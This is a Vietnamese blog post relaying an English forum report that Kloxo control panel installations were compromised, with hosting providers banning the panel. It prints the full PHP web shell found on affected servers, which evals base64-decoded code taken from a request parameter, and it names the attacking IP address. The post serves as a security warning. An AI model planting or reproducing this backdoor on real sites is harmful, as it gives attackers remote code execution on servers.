Kloxo Control Panel là một hosting Control Panel miễn phí được rất nhiều người sử dụng. Tuy nhiên, mới đây có nhiều thông tin cho thấy Kloxo dính lỗi bảo mật rất nghiêm trọng.
We had been considering dropping the Kloxo “Host In A Box” template anyway, since it hasn’t been updated for 2+ years, but now the final nail has been driven into the coffin.
Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the ‘default’ site accessible by IP address.
UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=
This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E=):
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST["8ba7afbaaddc67de33a3f"])!=NULL)eval(base64_decode($_REQUEST["8ba7afbaaddc67de33a3f"]));
elseecho "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >";
?>Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn’t have rDNS)Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We’ve had 4 instances this morning, and it’s effected Ramnode, if not others. Beware!Nguồn: https://vpsboard.com/topic/3384-kloxo-installations-compromised/
Ramnode thì cho rằng, Kloxo là nguyên nhân gây ra tình trạng quá tải CPU trên các hệ thống OpenVZ của họ.
Update 2: Kloxo users - http://www.webhostingtalk.com/showthread.php?t=1344003 . We are having to shutdown/suspend your VPSs due to the massive CPU load spikes and network traffic the exploit is generating. You can also read more here:https://vpsboard.com/topic/3384-kloxo-installations-compromised/
Update 3: Due to the severity of the exploit and high potential for further exploits, we have added Kloxo to our prohibited uses in the AUP. You will need to wipe your installation and use a different panel going forward
Hiện nhiều nhà cung cấp dịch vụ VPS, server như Ramnode, INIZ …đã cấm dùng Kloxo trên hệ thống của họ. Ramnode khuyến cáo người dùng sử dụng VestaCP, một hosting control miễn phí khác để thay thế.
Nguồn: Kloxo CP dính lỗi bảo mật nghiêm trọng, nhiều nhà cung cấp đã cấm dùng
Không có nhận xét nào:
Đăng nhận xét